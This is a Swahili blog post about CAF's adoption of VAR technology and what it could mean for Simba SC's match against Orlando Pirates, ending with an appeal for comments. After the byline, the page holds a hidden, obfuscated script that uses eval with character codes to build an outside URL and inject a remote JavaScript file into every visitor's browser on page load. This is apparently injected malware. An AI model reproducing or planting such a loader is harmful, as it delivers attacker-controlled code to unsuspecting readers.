V.A.R (Video Assistance Referee), ni teknolojie ambayo ilianzishwa takribani zaidi ya miaka minne iliyopita ili kuhakikisha haki inapatikana katika mchezo wa soka. Huu ulikuwa mpango mahususi wa shirikisho la mpira wa miguu duniani FIFA Chini ya Raisi Gianni Infantino Mholanzi aliyepokea kijiti toka kwa Blatter.
Siku za karibuni shirikisho la soka barani Afrika limeamua kuruhusu teckonolojia hii kutumika katika mashindano ya klabu bingwa na shirikisho barani humu huku moja ya klabu ya Tanzania Simba sports club ikiwa mshiriki wa mashindano hayo.
Uamuzi huo unaifanya Simba kuwa klabu ya kwanza nchini kutumia V.A.R ambapo itatumia teknolojia hiyo kwenye mchezo wake dhidi ya klabu ya Orlando Pirates ya Afrika kusini ambapo mchezo wa kwanza utakuwa hapa nchini na marudio ni Afrika kusini.
Kiuhalisia hiki ni kitu kipya kwa bara la Afrika hivyo ni lazima wadau wa soka kutolea macho na kutathmini kama litakuwa na faida au lah.
V.A.R ina lengo la kumsaidia refa kufanya maamuzi sahihi lakini haipunguzi wala kuondoa nguvu ya refa katika maamuzi sasa kwa wakati mwingine humgandamiza mtu au kumpa haki yake hivyo basi tegemeo la kuitumia VAR huwa ni haki lakini huenda isitendeke.
Kwa utashi na uwezo wa marefa wengi wa Afrika inaweza kuwasaidia kwa kuwa kumekuwa na malalamiko mengi juu ya kupendelea au kugandamiza baadhi ya timu hivyo basi endapo itatumika vyema inaweza kuwa msaada kwa marefa na timu kiujumla japo umakini ni muhimu pia.
Kwa mimi naona haikuwa sahihi sana kwa CAF kuruhusu matumizi ya VAR moja kwa moja wangefanya hata utaratibu wa majaribio mwanzoni mwa michuano ili kupunguza lawama maana VAR ni upanga mkali kwa Afrika utararua wengi sana.
Vipi wewe unaona itakuwaje? Dondosha Coment zako Tafadhali.
@ventasmalack
Huenda V.A.R ni Msala Kwa Simba
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
Recent Comments